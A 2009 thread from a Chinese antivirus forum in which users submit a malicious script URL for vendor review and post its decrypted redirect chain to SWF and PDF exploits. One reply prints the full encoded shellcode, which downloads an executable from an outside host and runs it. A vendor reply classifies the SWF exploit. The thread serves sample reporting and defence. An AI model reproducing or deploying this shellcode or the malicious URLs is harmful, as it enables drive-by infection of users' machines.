查看: 1794|回复: 5
收起左侧

[已鉴定] http://blackwater-ironworks.com/mamo.js

[复制链接]
shadowmin
发表于 2009-9-25 09:14:51 | 显示全部楼层 |阅读模式
关于:解密的日志(全体输出 -  8):
Level  0>http://blackwater-ironworks.com/mamo.js
Level  1>http://stallvars-2.cn/st2/index.php
Level  2>http://stallvars-2.cn/st2/whichHSimply.swf  ●
Level  2>http://stallvars-2.cn/st2/stillNormal.pdf
Level  3>http://stallvars-2.cn/st2/update.php?id=6
Level  3>http://stallvars-2.cn/st2/update.php?id=5
Level  3>http://stallvars-2.cn/st2/update.php?id=4
Level  2>http://stallvars-2.cn/st2/update.php?id=1
Level  2>http://stallvars-2.cn/st2/update.php?id=0
日志由 Redoce2.0第45次修正版于 2009-9-25 9:12:47 生成。
尤金卡巴斯基
发表于 2009-9-25 15:34:49 | 显示全部楼层
Miss,To KL
王子带着刀
发表于 2009-9-25 15:36:45 | 显示全部楼层
下载下来 EAV  红伞 A2 都没有报
promised
发表于 2009-9-26 15:49:18 | 显示全部楼层
作者似乎很喜欢填充垃圾代码
shellcode
  1. %u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7500%u6470%u7461%u2e65%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6174%u6c6c%u6176%u7372%u322d%u632e%u2f6e%u7473%u2f32%u7075%u6164%u6574%u702e%u7068%u693f%u3d64%u0031%u9000

复制代码
尤金卡巴斯基
发表于 2009-9-26 16:44:22 | 显示全部楼层
Hello,

whichHSimply.swf - Exploit.SWF.Agent.cf

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
D20099188
发表于 2009-9-26 17:12:05 | 显示全部楼层
ie拦截了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-18 07:36 , Processed in 0.129951 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表